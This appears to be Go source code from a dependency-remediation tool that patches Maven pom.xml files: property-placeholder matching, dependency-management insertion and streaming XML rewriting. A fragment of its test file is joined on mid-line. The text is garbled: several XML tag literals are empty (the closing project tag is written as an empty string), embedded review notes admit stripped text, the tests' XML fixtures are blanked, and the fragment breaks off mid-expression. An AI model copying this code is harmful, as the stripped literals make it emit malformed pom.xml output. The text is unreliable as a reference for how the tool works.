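			depOrigin, _ = strings.CutSuffix(depOrigin, "@"+mavenutil.OriginManagement)
		} else {
			// Properties are defined either universally or in a profile. For property
			// origin not starting with 'profile', this is an universal property.
			depOrigin = ""
		}

		for name, value := range properties {
			// A dependency in a profile may contain properties from this profile or
			// properties universally defined. We need to figure out the origin of these
			// properties. If a property is defined both universally and in the profile,
			// we use the profile's origin.
			propertyOrigin := ""
			for _, p := range specific.Properties {
				if p.Name == name && p.Origin != "" && p.Origin == depOrigin {
					propertyOrigin = depOrigin
				}
			}
			if _, ok := target.PropertyPatches[propertyOrigin]; !ok {
				target.PropertyPatches[propertyOrigin] = make(map[string]string)
			}
			// This property has been set to update to a value. If both values are the
			// same, we do nothing; otherwise, instead of updating the property, we
			// should update the dependency directly.
			if preset, ok := target.PropertyPatches[propertyOrigin][name]; !ok {
				target.PropertyPatches[propertyOrigin][name] = value
			} else if preset != value {
				if err := target.DependencyPatches.addPatch(patch, true); err != nil {
					return nil, err
				}
			}
		}
	}

	return result, nil
}

// originalDependency returns the original dependency of a dependency patch.
// If the dependency is not found in any local pom.xml, an empty dependency is returned.
func originalDependency(patch DependencyPatch, origDeps []DependencyWithOrigin) DependencyWithOrigin {
	parts := strings.Split(patch.Pkg.Name, ":")
	if len(parts) != 2 {
		return DependencyWithOrigin{}
	}

	// The conversion error is deliberately ignored: only the key fields of the
	// returned dependency are used, and the group/artifact IDs are set below.
	want, _, _ := resolve.MavenDepTypeToDependency(patch.Type)
	want.GroupID = maven.String(parts[0])
	want.ArtifactID = maven.String(parts[1])

	for _, d := range origDeps {
		if d.Key() == want.Key() && d.Version != "" {
			// If the version is empty, keep looking until we find some non-empty requirement.
			return d
		}
	}

	return DependencyWithOrigin{}
}

// generatePropertyPatches returns whether we are able to assign values to
// placeholder keys to convert s1 to s2, as well as the generated patches.
// s1 contains property placeholders like '${name}' and s2 is the target string.
func generatePropertyPatches(s1, s2 string) (map[string]string, bool) {
	patches := make(map[string]string)
	ok := generatePropertyPatchesAux(s1, s2, patches)

	return patches, ok
}

// generatePropertyPatchesAux generates property patches and store them in patches.
//
// Both strings originate from manifest content and the requested version, so
// every slice bound is checked first: a template without a placeholder, an
// unterminated placeholder, or a target shorter than the template's literal
// prefix or suffix makes the function return false instead of panicking.
// TODO: property may refer to another property ${${name}.version}
func generatePropertyPatchesAux(s1, s2 string, patches map[string]string) bool {
	start := strings.Index(s1, "${")
	if start < 0 {
		// No placeholder to assign a value to.
		return false
	}
	if !strings.HasPrefix(s2, s1[:start]) {
		// Cannot update property to match the prefix
		return false
	}

	// Look for the closing brace after the opening "${", so that a stray "}"
	// earlier in the string cannot yield an end index before start.
	rel := strings.Index(s1[start+2:], "}")
	if rel < 0 {
		return false
	}
	end := start + 2 + rel
	name := s1[start+2 : end]
	rest := s1[end+1:]

	next := strings.Index(rest, "${")
	if next < 0 {
		// There are no more placeholders: rest is a literal suffix that s2 must
		// end with, without overlapping the literal prefix already matched.
		if len(s2)-len(rest) < start || !strings.HasSuffix(s2, rest) {
			return false
		}
		patches[name] = s2[start : len(s2)-len(rest)]

		return true
	}

	// Try to match the substring between two property placeholders.
	// A match at offset 0 would leave this placeholder empty and is rejected.
	match := strings.Index(s2[start:], rest[:next])
	if match <= 0 {
		return false
	}
	patches[name] = s2[start : start+match]

	return generatePropertyPatchesAux(rest, s2[start+match:], patches)
}

// projectStartElement returns the raw text of the opening project tag found in
// raw, or "" when it cannot be located.
// NOTE(review): on this page the two search literals and the first bounds
// check were missing (the text between '<' and '>' appears to have been
// stripped); they are restored here from the surrounding logic. Confirm
// against the repository.
func projectStartElement(raw string) string {
	start := strings.Index(raw, "<project")
	if start < 0 {
		return ""
	}
	end := strings.Index(raw[start:], ">")
	if end < 0 {
		return ""
	}

	return raw[start : start+end+1]
}

// Only for writing dependencies that are not from the base project.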
type dependencyManagement struct {
	// Encoded as a <dependencies> element holding one <dependency> per entry.
	Dependencies []dependency `xml:"dependencies>dependency,omitempty"`
}

// dependency is the reduced dependency element written for newly added
// entries; every field is omitted from the output when empty.
type dependency struct {
	GroupID    string `xml:"groupId,omitempty"`
	ArtifactID string `xml:"artifactId,omitempty"`
	Version    string `xml:"version,omitempty"`
	Type       string `xml:"type,omitempty"`
	Classifier string `xml:"classifier,omitempty"`
}

// makeDependency converts a MavenPatch into the dependency element to write,
// using the patch's NewRequire as the version.
func makeDependency(patch MavenPatch) dependency {
	d := dependency{
		GroupID:    string(patch.GroupID),
		ArtifactID: string(patch.ArtifactID),
		Version:    patch.NewRequire,
		Classifier: string(patch.Classifier),
	}
	// The type is left out when it is empty or "jar".
	if patch.Type != "" && patch.Type != "jar" {
		d.Type = string(patch.Type)
	}

	return d
}

// compareDependency orders dependencies by group ID, artifact ID, type,
// classifier and finally version, for use with slices.SortFunc.
func compareDependency(d1, d2 dependency) int {
	if i := cmp.Compare(d1.GroupID, d2.GroupID); i != 0 {
		return i
	}
	if i := cmp.Compare(d1.ArtifactID, d2.ArtifactID); i != 0 {
		return i
	}
	if i := cmp.Compare(d1.Type, d2.Type); i != 0 {
		return i
	}
	if i := cmp.Compare(d1.Classifier, d2.Classifier); i != 0 {
		return i
	}

	return cmp.Compare(d1.Version, d2.Version)
}

// write streams the XML document in raw to w, applying patches to the project
// element and copying every other token through the encoder.
func write(raw string, w io.Writer, patches MavenPatches) error {
	dec := internalxml.NewDecoder(bytes.NewReader([]byte(raw)))
	enc := internalxml.NewEncoder(w)

	for {
		token, err := dec.Token()
		if errors.Is(err, io.EOF) {
			break
		}
		if err != nil {
			return fmt.Errorf("getting token: %w", err)
		}

		if tt, ok := token.(internalxml.StartElement); ok {
			if tt.Name.Local == "project" {
				type RawProject struct {
					InnerXML string `xml:",innerxml"`
				}
				// DecodeElement consumes the whole project element, so the
				// decoder resumes after its end tag.
				var rawProj RawProject
				if err := dec.DecodeElement(&rawProj, &tt); err != nil {
					return err
				}

				// xml.EncodeToken writes a start element with its all name spaces.
				// It's very common to have a start project element with a few name spaces in Maven.
				// Thus this would cause a big diff when we try to encode the start element of project.

				// We first capture the raw start element string and write it.
				// This goes to w directly, bypassing enc; tokens encoded before
				// this point were flushed at the end of their loop iteration.
				projectStart := projectStartElement(raw)
				if projectStart == "" {
					return errors.New("unable to get start element of project")
				}
				if _, err := w.Write([]byte(projectStart)); err != nil {
					return fmt.Errorf("writing start element of project: %w", err)
				}

				// Then we update the project by passing the innerXML and name spaces are not passed.
				updated := make(map[string]bool) // origin -> updated
				if err := writeProject(w, enc, rawProj.InnerXML, "", "", patches.DependencyPatches, patches.PropertyPatches, updated); err != nil {
					return fmt.Errorf("updating project: %w", err)
				}

				// Check whether dependency management is updated, if not, add a new section of dependency management.
				if dmPatches := patches.DependencyPatches[mavenutil.OriginManagement]; len(dmPatches) > 0 && !updated[mavenutil.OriginManagement] {
					enc.Indent(" ", " ")
					var dm dependencyManagement
					for p := range dmPatches {
						dm.Dependencies = append(dm.Dependencies, makeDependency(p))
					}
					// Sort dependency management for consistency in testing.
					slices.SortFunc(dm.Dependencies, compareDependency)
					if err := enc.Encode(dm); err != nil {
						return err
					}
					if _, err := w.Write([]byte("\n\n")); err != nil {
						return err
					}
					// Reset the encoder's indentation for the tokens that follow.
					enc.Indent("", "")
				}

				// Finally we write the end element of project.
				// NOTE(review): the literal written here is empty on this page;
				// presumably the closing project tag was stripped in extraction.
				// The error text below also says "start element" on the end-tag
				// path. Confirm both against the repository.
				if _, err := w.Write([]byte("")); err != nil {
					return fmt.Errorf("writing start element of project: %w", err)
				}

				continue
			}
		}
		if err := enc.EncodeToken(token); err != nil {
			return err
		}
		// Flush after every token so the direct writes to w above stay in order.
		if err := enc.Flush(); err != nil {
			return err
		}
	}

	return nil
}

// writeProject re-encodes the XML fragment in raw through enc, rewriting the
// parent, properties, profile, plugin, dependencyManagement and dependencies
// elements it meets and copying all other tokens unchanged.
//
// prefix and id name the profile or plugin being processed and are both ""
// for the project itself; together they form the origin used to look up
// entries in patches and properties. Each origin whose dependencies or
// dependencyManagement section is encountered is recorded in updated.
//
// NOTE(review): every string literal concatenated around an InnerXML value
// below is empty on this page; presumably the element's start and end tags
// were stripped in extraction. Confirm against the repository.
func writeProject(w io.Writer, enc *internalxml.Encoder, raw, prefix, id string, patches MavenDependencyPatches, properties MavenPropertyPatches, updated map[string]bool) error {
	dec := internalxml.NewDecoder(bytes.NewReader([]byte(raw)))
	for {
		token, err := dec.Token()
		if errors.Is(err, io.EOF) {
			break
		}
		if err != nil {
			return err
		}

		if tt, ok := token.(internalxml.StartElement); ok {
			switch tt.Name.Local {
			case "parent":
				updated["parent"] = true
				type RawParent struct {
					maven.ProjectKey

					InnerXML string `xml:",innerxml"`
				}
				var rawParent RawParent
				if err := dec.DecodeElement(&rawParent, &tt); err != nil {
					return err
				}
				// Keep the existing version unless a parent patch replaces it.
				req := string(rawParent.Version)
				if parentPatches, ok := patches["parent"]; ok {
					// There should only be one parent patch
					if len(parentPatches) > 1 {
						return fmt.Errorf("multiple parent patches: %v", parentPatches)
					}
					for k := range parentPatches {
						req = k.NewRequire
					}
				}
				if err := writeString(enc, ""+rawParent.InnerXML+"", map[string]string{"version": req}); err != nil {
					return fmt.Errorf("updating parent: %w", err)
				}

				continue
			case "properties":
				type RawProperties struct {
					InnerXML string `xml:",innerxml"`
				}
				var rawProperties RawProperties
				if err := dec.DecodeElement(&rawProperties, &tt); err != nil {
					return err
				}
				// Only the property patches recorded for this origin are applied.
				if err := writeString(enc, ""+rawProperties.InnerXML+"", properties[mavenOrigin(prefix, id)]); err != nil {
					return fmt.Errorf("updating properties: %w", err)
				}

				continue
			case "profile":
				if prefix != "" || id != "" {
					// Skip updating if prefix or id is set to avoid infinite recursion
					// (break leaves only the switch; the token is encoded unchanged below)
					break
				}
				type RawProfile struct {
					maven.Profile

					InnerXML string `xml:",innerxml"`
				}
				var rawProfile RawProfile
				if err := dec.DecodeElement(&rawProfile, &tt); err != nil {
					return err
				}
				if err := writeProject(w, enc, ""+rawProfile.InnerXML+"", mavenutil.OriginProfile, string(rawProfile.ID), patches, properties, updated); err != nil {
					return fmt.Errorf("updating profile: %w", err)
				}

				continue
			case "plugin":
				if prefix != "" || id != "" {
					// Skip updating if prefix or id is set to avoid infinite recursion
					// (break leaves only the switch; the token is encoded unchanged below)
					break
				}
				type RawPlugin struct {
					maven.Plugin

					InnerXML string `xml:",innerxml"`
				}
				var rawPlugin RawPlugin
				if err := dec.DecodeElement(&rawPlugin, &tt); err != nil {
					return err
				}
				// NOTE(review): the error text says "profile" on the plugin path.
				if err := writeProject(w, enc, ""+rawPlugin.InnerXML+"", mavenutil.OriginPlugin, rawPlugin.Name(), patches, properties, updated); err != nil {
					return fmt.Errorf("updating profile: %w", err)
				}

				continue
			case "dependencyManagement":
				type RawDependencyManagement struct {
					maven.DependencyManagement

					InnerXML string `xml:",innerxml"`
				}
				var rawDepMgmt RawDependencyManagement
				if err := dec.DecodeElement(&rawDepMgmt, &tt); err != nil {
					return err
				}
				// Mark this origin's management section as present, so write
				// does not append a second one for the project itself.
				o := mavenOrigin(prefix, id, mavenutil.OriginManagement)
				updated[o] = true
				dmPatches := patches[o]
				if err := writeDependency(w, enc, ""+rawDepMgmt.InnerXML+"", dmPatches); err != nil {
					return fmt.Errorf("updating dependency management: %w", err)
				}

				continue
			case "dependencies":
				type RawDependencies struct {
					Dependencies []maven.Dependency `xml:"dependencies"`
					InnerXML     string             `xml:",innerxml"`
				}
				var rawDeps RawDependencies
				if err := dec.DecodeElement(&rawDeps, &tt); err != nil {
					return err
				}
				o := mavenOrigin(prefix, id)
				updated[o] = true
				depPatches := patches[o]
				if err := writeDependency(w, enc, ""+rawDeps.InnerXML+"", depPatches); err != nil {
					return fmt.Errorf("updating dependencies: %w", err)
				}

				continue
			}
		}
		if err := enc.EncodeToken(token); err != nil {
			return err
		}
	}

	return enc.Flush()
}

// indentation returns the indentation of the dependency element.
// If dependencies or dependency elements are not found, the default
// indentation (four space) is returned.
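func indentation(raw string) string {
	const (
		// Fallback used whenever the indentation cannot be derived from raw.
		defaultIndent = "    "
		depsTag       = "<dependencies>"
		depTag        = "<dependency>"
	)

	// Everything after the opening <dependencies> tag.
	_, afterDeps, found := strings.Cut(raw, depsTag)
	if !found {
		return defaultIndent
	}

	// Find the first dependency element and keep only what precedes it.
	beforeDep, _, found := strings.Cut(afterDeps, depTag)
	if !found {
		return defaultIndent
	}

	// Find the last new line and get the space between it and the element.
	// If both tags are on one line there is no indentation to copy.
	k := strings.LastIndex(beforeDep, "\n")
	if k < 0 {
		return defaultIndent
	}

	return beforeDep[k+1:]
}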
func writeString(enc *internalxml.Encoder, raw string, values map[string]string) error {
	// Streams raw token by token into enc. An element whose local name is a
	// key of values has its whole content replaced by the mapped value; every
	// other token is copied through as-is.
	reader := internalxml.NewDecoder(bytes.NewReader([]byte(raw)))
	for {
		tok, err := reader.Token()
		switch {
		case errors.Is(err, io.EOF):
			// End of input: push out whatever the encoder still buffers.
			return enc.Flush()
		case err != nil:
			return err
		}

		start, isStart := tok.(internalxml.StartElement)
		replacement, patched := "", false
		if isStart {
			replacement, patched = values[start.Name.Local]
		}

		if !patched {
			if err := enc.EncodeToken(tok); err != nil {
				return err
			}

			continue
		}

		// Consume the original element (its text is discarded) so the decoder
		// moves past its end tag, then emit the same start element with the
		// replacement as content.
		// NOTE(review): the replacement goes through the encoder rather than
		// being concatenated into the output; presumably it is escaped as
		// character data like encoding/xml does - confirm for internalxml.
		var discarded string
		if err := reader.DecodeElement(&discarded, &start); err != nil {
			return err
		}
		if err := enc.EncodeElement(replacement, start); err != nil {
			return err
		}
	}
}
typ.AddAttr(dep.MavenArtifactType, artifactType) } if classifier != "" { typ.AddAttr(dep.MavenClassifier, classifier) } return MakeRequirementKey(resolve.RequirementVersion{ VersionKey: resolve.VersionKey{ PackageKey: resolve.PackageKey{ Name: name, System: resolve.Maven, }, }, Type: typ, }) } func TestMavenReadWrite(t *testing.T) { t.Parallel() srv := testutility.NewMockHTTPServer(t) srv.SetResponse(t, "org/upstream/parent-pom/1.2.3/parent-pom-1.2.3.pom", []byte(` org.upstream parent-pom 1.2.3 pom bbb 2.2.2 org.example ${bbb.artifact} ${bbb.version} `)) srv.SetResponse(t, "org/import/import/1.0.0/import-1.0.0.pom", []byte(` org.import import 1.0.0 pom 3.3.3 org.example ccc ${ccc.version} `)) cwd := testutility.GetCurrentWorkingDirectory(t) df, err := depfile.OpenLocalDepFile(filepath.Join(cwd, "testdata", "maven", "my-app", "pom.xml")) if err != nil { t.Fatalf("failed to open file: %v", err) } defer df.Close() client, _ := datasource.NewMavenRegistryAPIClient(datasource.MavenRegistry{URL: srv.URL, ReleasesEnabled: true}) mavenRW := MavenReadWriter{MavenRegistryAPIClient: client} got, err := mavenRW.Read(df) if err != nil { t.Fatalf("failed to read file: %v", err) } if !strings.HasSuffix(got.FilePath, "pom.xml") { t.Errorf("manifest file path %v does not have pom.xml", got.FilePath) } got.FilePath = "" depType := depMgmt.Clone() depType.AddAttr(dep.MavenArtifactType, "pom") depType.AddAttr(dep.Scope, "import") depParent.AddAttr(dep.MavenArtifactType, "pom") var depExclusions dep.Type depExclusions.AddAttr(dep.MavenExclusions, "org.exclude:exclude") want := Manifest{ Root: resolve.Version{ VersionKey: resolve.VersionKey{ PackageKey: resolve.PackageKey{ System: resolve.Maven, Name: "com.mycompany.app:my-app", }, VersionType: resolve.Concrete, Version: "1.0", }, }, Requirements: []resolve.RequirementVersion{ { VersionKey: resolve.VersionKey{ PackageKey: resolve.PackageKey{ System: resolve.Maven, Name: "junit:junit", }, VersionType: resolve.Requirement, Version: 
"4.12", }, // Type: dep.NewType(dep.Test), test scope is ignored to make resolution work. }, { VersionKey: resolve.VersionKey{ PackageKey: resolve.PackageKey{ System: resolve.Maven, Name: "org.example:abc", }, VersionType: resolve.Requirement, Version: "1.0.1", }, }, { VersionKey: resolve.VersionKey{ PackageKey: resolve.PackageKey{ System: resolve.Maven, Name: "org.example:no-version", }, VersionType: resolve.Requirement, Version: "2.0.0", }, }, { VersionKey: resolve.VersionKey{ PackageKey: resolve.PackageKey{ System: resolve.Maven, Name: "org.example:exclusions", }, VersionType: resolve.Requirement, Version: "1.0.0", }, Type: depExclusions, }, { VersionKey: resolve.VersionKey{ PackageKey: resolve.PackageKey{ System: resolve.Maven, Name: "org.profile:abc", }, VersionType: resolve.Requirement, Version: "1.2.3", }, }, { VersionKey: resolve.VersionKey{ PackageKey: resolve.PackageKey{ System: resolve.Maven, Name: "org.profile:def", }, VersionType: resolve.Requirement, Version: "2.3.4", }, }, { VersionKey: resolve.VersionKey{ PackageKey: resolve.PackageKey{ System: resolve.Maven, Name: "org.example:ddd", }, VersionType: resolve.Requirement, Version: "1.2.3", }, }, { VersionKey: resolve.VersionKey{ PackageKey: resolve.PackageKey{ System: resolve.Maven, Name: "org.example:xyz", }, VersionType: resolve.Requirement, Version: "2.0.0", }, Type: depMgmt, }, { VersionKey: resolve.VersionKey{ PackageKey: resolve.PackageKey{ System: resolve.Maven, Name: "org.example:no-version", }, VersionType: resolve.Requirement, Version: "2.0.0", }, Type: depMgmt, }, { VersionKey: resolve.VersionKey{ PackageKey: resolve.PackageKey{ System: resolve.Maven, Name: "org.example:aaa", }, VersionType: resolve.Requirement, Version: "1.1.1", }, Type: depMgmt, }, { VersionKey: resolve.VersionKey{ PackageKey: resolve.PackageKey{ System: resolve.Maven, Name: "org.example:bbb", }, VersionType: resolve.Requirement, Version: "2.2.2", }, Type: depMgmt, }, { VersionKey: resolve.VersionKey{ PackageKey: 
resolve.PackageKey{ System: resolve.Maven, Name: "org.example:ccc", }, VersionType: resolve.Requirement, Version: "3.3.3", }, Type: depMgmt, }, }, Groups: map[RequirementKey][]string{ mavenReqKey(t, "junit:junit", "", ""): {"test"}, mavenReqKey(t, "org.import:xyz", "pom", ""): {"import"}, }, EcosystemSpecific: MavenManifestSpecific{ Parent: maven.Parent{ ProjectKey: maven.ProjectKey{ GroupID: "org.parent", ArtifactID: "parent-pom", Version: "1.1.1", }, RelativePath: "../parent/pom.xml", }, Properties: []PropertyWithOrigin{ {Property: maven.Property{Name: "project.build.sourceEncoding", Value: "UTF-8"}}, {Property: maven.Property{Name: "maven.compiler.source", Value: "1.7"}}, {Property: maven.Property{Name: "maven.compiler.target", Value: "1.7"}}, {Property: maven.Property{Name: "junit.version", Value: "4.12"}}, {Property: maven.Property{Name: "zeppelin.daemon.package.base", Value: "../bin"}}, {Property: maven.Property{Name: "def.version", Value: "2.3.4"}, Origin: "profile@profile-one"}, }, OriginalRequirements: []DependencyWithOrigin{ { Dependency: maven.Dependency{GroupID: "org.parent", ArtifactID: "parent-pom", Version: "1.1.1", Type: "pom"}, Origin: "parent", }, { Dependency: maven.Dependency{GroupID: "junit", ArtifactID: "junit", Version: "${junit.version}", Scope: "test"}, }, { Dependency: maven.Dependency{GroupID: "org.example", ArtifactID: "abc", Version: "1.0.1"}, }, { Dependency: maven.Dependency{GroupID: "org.example", ArtifactID: "no-version"}, }, { Dependency: maven.Dependency{GroupID: "org.example", ArtifactID: "exclusions", Version: "1.0.0", Exclusions: []maven.Exclusion{ {GroupID: "org.exclude", ArtifactID: "exclude"}, }}, }, { Dependency: maven.Dependency{GroupID: "org.example", ArtifactID: "xyz", Version: "2.0.0"}, Origin: "management", }, { Dependency: maven.Dependency{GroupID: "org.example", ArtifactID: "no-version", Version: "2.0.0"}, Origin: "management", }, { Dependency: maven.Dependency{GroupID: "org.import", ArtifactID: "import", Version: 
"1.0.0", Scope: "import", Type: "pom"}, Origin: "management", }, { Dependency: maven.Dependency{GroupID: "org.profile", ArtifactID: "abc", Version: "1.2.3"}, Origin: "profile@profile-one", }, { Dependency: maven.Dependency{GroupID: "org.profile", ArtifactID: "def", Version: "${def.version}"}, Origin: "profile@profile-one", }, { Dependency: maven.Dependency{GroupID: "org.import", ArtifactID: "xyz", Version: "6.6.6", Scope: "import", Type: "pom"}, Origin: "profile@profile-two@management", }, { Dependency: maven.Dependency{GroupID: "org.dep", ArtifactID: "plugin-dep", Version: "2.3.3"}, Origin: "plugin@org.plugin:plugin", }, }, RequirementsForUpdates: []resolve.RequirementVersion{ { VersionKey: resolve.VersionKey{ PackageKey: resolve.PackageKey{ System: resolve.Maven, Name: "org.parent:parent-pom", }, VersionType: resolve.Requirement, Version: "1.1.1", }, Type: depParent, }, { VersionKey: resolve.VersionKey{ PackageKey: resolve.PackageKey{ System: resolve.Maven, Name: "org.import:import", }, VersionType: resolve.Requirement, Version: "1.0.0", }, Type: depType, }, { VersionKey: resolve.VersionKey{ PackageKey: resolve.PackageKey{ System: resolve.Maven, Name: "org.profile:abc", }, VersionType: resolve.Requirement, Version: "1.2.3", }, }, { VersionKey: resolve.VersionKey{ PackageKey: resolve.PackageKey{ System: resolve.Maven, Name: "org.profile:def", }, VersionType: resolve.Requirement, Version: "${def.version}", }, }, { VersionKey: resolve.VersionKey{ PackageKey: resolve.PackageKey{ System: resolve.Maven, Name: "org.import:xyz", }, VersionType: resolve.Requirement, Version: "6.6.6", }, Type: depType, }, { VersionKey: resolve.VersionKey{ PackageKey: resolve.PackageKey{ System: resolve.Maven, Name: "org.dep:plugin-dep", }, VersionType: resolve.Requirement, Version: "2.3.3", }, }, }, }, } if diff := cmp.Diff(want, got); diff != "" { t.Errorf("Maven manifest mismatch (-want +got):\n%s", diff) } // Re-open the file for writing. 
df, err = depfile.OpenLocalDepFile(filepath.Join(cwd, "testdata", "maven", "my-app", "pom.xml")) if err != nil { t.Fatalf("failed to open file: %v", err) } defer df.Close() out := new(bytes.Buffer) // There are no patches since we are only testing tabs are not escaped. if err := mavenRW.Write(df, out, Patch{Manifest: &want}); err != nil { t.Fatalf("failed to write Maven pom.xml: %v", err) } testutility.NewSnapshot().WithCRLFReplacement().MatchText(t, out.String()) } func TestMavenWrite(t *testing.T) { t.Parallel() cwd := testutility.GetCurrentWorkingDirectory(t) df, err := depfile.OpenLocalDepFile(filepath.Join(cwd, "testdata", "maven", "my-app", "pom.xml")) if err != nil { t.Fatalf("fail to open file: %v", err) } defer df.Close() in := new(bytes.Buffer) if _, err := in.ReadFrom(df); err != nil { t.Fatalf("failed to read from DepFile: %v", err) } patches := MavenPatches{ DependencyPatches: MavenDependencyPatches{ "": map[MavenPatch]bool{ { DependencyKey: maven.DependencyKey{ GroupID: "org.example", ArtifactID: "abc", Type: "jar", }, NewRequire: "1.0.2", }: true, { DependencyKey: maven.DependencyKey{ GroupID: "org.example", ArtifactID: "no-version", Type: "jar", }, NewRequire: "2.0.1", }: true, }, "management": map[MavenPatch]bool{ { DependencyKey: maven.DependencyKey{ GroupID: "org.example", ArtifactID: "xyz", Type: "jar", }, NewRequire: "2.0.1", }: true, { DependencyKey: maven.DependencyKey{ GroupID: "org.example", ArtifactID: "extra-one", Type: "jar", }, NewRequire: "6.6.6", }: false, { DependencyKey: maven.DependencyKey{ GroupID: "org.example", ArtifactID: "extra-two", Type: "jar", }, NewRequire: "9.9.9", }: false, }, "profile@profile-one": map[MavenPatch]bool{ { DependencyKey: maven.DependencyKey{ GroupID: "org.profile", ArtifactID: "abc", Type: "jar", }, NewRequire: "1.2.4", }: true, }, "profile@profile-two@management": map[MavenPatch]bool{ { DependencyKey: maven.DependencyKey{ GroupID: "org.import", ArtifactID: "xyz", Type: "pom", }, NewRequire: "7.0.0", }: 
// TestMavenWriteDM writes patches for the "management" origin (all flagged
// false, i.e. not present in the base project) against the
// no-dependency-management.xml fixture, together with one direct and one
// parent patch, and compares the result with the stored snapshot.
func TestMavenWriteDM(t *testing.T) {
	t.Parallel()

	pomPath := filepath.Join(testutility.GetCurrentWorkingDirectory(t), "testdata", "maven", "no-dependency-management.xml")
	df, err := depfile.OpenLocalDepFile(pomPath)
	if err != nil {
		t.Fatalf("fail to open file: %v", err)
	}
	defer df.Close()

	var in bytes.Buffer
	if _, err := in.ReadFrom(df); err != nil {
		t.Fatalf("failed to read from DepFile: %v", err)
	}

	// Patch for a dependency declared directly in the project.
	directPatches := map[MavenPatch]bool{
		{
			DependencyKey: maven.DependencyKey{
				GroupID:    "junit",
				ArtifactID: "junit",
				Type:       "jar",
			},
			NewRequire: "4.13.2",
		}: true,
	}
	// Patch for the parent POM version.
	parentPatches := map[MavenPatch]bool{
		{
			DependencyKey: maven.DependencyKey{
				GroupID:    "org.parent",
				ArtifactID: "parent-pom",
				Type:       "jar",
			},
			NewRequire: "1.2.0",
		}: true,
	}
	// Dependency-management entries that are flagged as not yet in the file.
	managementPatches := map[MavenPatch]bool{
		{
			DependencyKey: maven.DependencyKey{
				GroupID:    "org.management",
				ArtifactID: "abc",
				Type:       "jar",
			},
			NewRequire: "1.2.3",
		}: false,
		{
			DependencyKey: maven.DependencyKey{
				GroupID:    "org.management",
				ArtifactID: "xyz",
				Type:       "jar",
			},
			NewRequire: "2.3.4",
		}: false,
	}

	patches := MavenPatches{
		DependencyPatches: MavenDependencyPatches{
			"":           directPatches,
			"parent":     parentPatches,
			"management": managementPatches,
		},
	}

	var out bytes.Buffer
	if err := write(in.String(), &out, patches); err != nil {
		t.Fatalf("unable to update Maven pom.xml: %v", err)
	}
	testutility.NewSnapshot().WithCRLFReplacement().MatchText(t, out.String())
}
"parent", "pom.xml") depProfileTwoMgmt.AddAttr(dep.MavenArtifactType, "pom") depProfileTwoMgmt.AddAttr(dep.Scope, "import") depParent.AddAttr(dep.MavenArtifactType, "pom") patches := []DependencyPatch{ { Pkg: resolve.PackageKey{ System: resolve.Maven, Name: "org.dep:plugin-dep", }, Type: depPlugin, NewRequire: "2.3.4", }, { Pkg: resolve.PackageKey{ System: resolve.Maven, Name: "org.example:abc", }, NewRequire: "1.0.2", }, { Pkg: resolve.PackageKey{ System: resolve.Maven, Name: "org.example:aaa", }, NewRequire: "1.2.0", }, { Pkg: resolve.PackageKey{ System: resolve.Maven, Name: "org.example:ddd", }, NewRequire: "1.3.0", }, { Pkg: resolve.PackageKey{ System: resolve.Maven, Name: "org.example:property", }, NewRequire: "1.0.1", }, { Pkg: resolve.PackageKey{ System: resolve.Maven, Name: "org.example:same-property", }, NewRequire: "1.0.1", }, { Pkg: resolve.PackageKey{ System: resolve.Maven, Name: "org.example:another-property", }, NewRequire: "1.1.0", }, { Pkg: resolve.PackageKey{ System: resolve.Maven, Name: "org.example:property-no-update", }, NewRequire: "2.0.0", }, { Pkg: resolve.PackageKey{ System: resolve.Maven, Name: "org.example:xyz", }, Type: depMgmt, NewRequire: "2.0.1", }, { Pkg: resolve.PackageKey{ System: resolve.Maven, Name: "org.import:xyz", }, Type: depProfileTwoMgmt, NewRequire: "6.7.0", }, { Pkg: resolve.PackageKey{ System: resolve.Maven, Name: "org.profile:abc", }, Type: depProfileOne, NewRequire: "1.2.4", }, { Pkg: resolve.PackageKey{ System: resolve.Maven, Name: "org.profile:def", }, Type: depProfileOne, NewRequire: "2.3.5", }, { Pkg: resolve.PackageKey{ System: resolve.Maven, Name: "org.parent:parent-pom", }, Type: depParent, NewRequire: "1.2.0", }, { Pkg: resolve.PackageKey{ System: resolve.Maven, Name: "org.example:suggest", }, Type: depMgmt, OrigRequire: "1.0.0", NewRequire: "2.0.0", }, { Pkg: resolve.PackageKey{ System: resolve.Maven, Name: "org.example:override", }, Type: depMgmt, NewRequire: "2.0.0", }, { Pkg: resolve.PackageKey{ System: 
resolve.Maven, Name: "org.example:no-version", }, Type: depMgmt, NewRequire: "2.0.1", }, } specific := MavenManifestSpecific{ Parent: maven.Parent{ ProjectKey: maven.ProjectKey{ GroupID: "org.parent", ArtifactID: "parent-pom", Version: "1.1.1", }, RelativePath: "../parent/pom.xml", }, Properties: []PropertyWithOrigin{ {Property: maven.Property{Name: "property.version", Value: "1.0.0"}}, {Property: maven.Property{Name: "no.update.minor", Value: "9"}}, {Property: maven.Property{Name: "def.version", Value: "2.3.4"}, Origin: "profile@profile-one"}, {Property: maven.Property{Name: "aaa.version", Value: "1.1.1"}, Origin: "parent@" + parentPath}, }, OriginalRequirements: []DependencyWithOrigin{ { Dependency: maven.Dependency{GroupID: "org.parent", ArtifactID: "parent-pom", Version: "1.2.0", Type: "pom"}, Origin: "parent", }, { Dependency: maven.Dependency{GroupID: "junit", ArtifactID: "junit", Version: "${junit.version}", Scope: "test"}, }, { Dependency: maven.Dependency{GroupID: "org.example", ArtifactID: "abc", Version: "1.0.1"}, }, { Dependency: maven.Dependency{GroupID: "org.example", ArtifactID: "no-updates", Version: "9.9.9"}, }, { Dependency: maven.Dependency{GroupID: "org.example", ArtifactID: "no-version"}, }, { Dependency: maven.Dependency{GroupID: "org.example", ArtifactID: "property", Version: "${property.version}"}, }, { Dependency: maven.Dependency{GroupID: "org.example", ArtifactID: "property-no-update", Version: "1.${no.update.minor}"}, }, { Dependency: maven.Dependency{GroupID: "org.example", ArtifactID: "same-property", Version: "${property.version}"}, }, { Dependency: maven.Dependency{GroupID: "org.example", ArtifactID: "another-property", Version: "${property.version}"}, }, { Dependency: maven.Dependency{GroupID: "org.example", ArtifactID: "no-version", Version: "2.0.0"}, Origin: "management", }, { Dependency: maven.Dependency{GroupID: "org.example", ArtifactID: "xyz", Version: "2.0.0"}, Origin: "management", }, { Dependency: maven.Dependency{GroupID: 
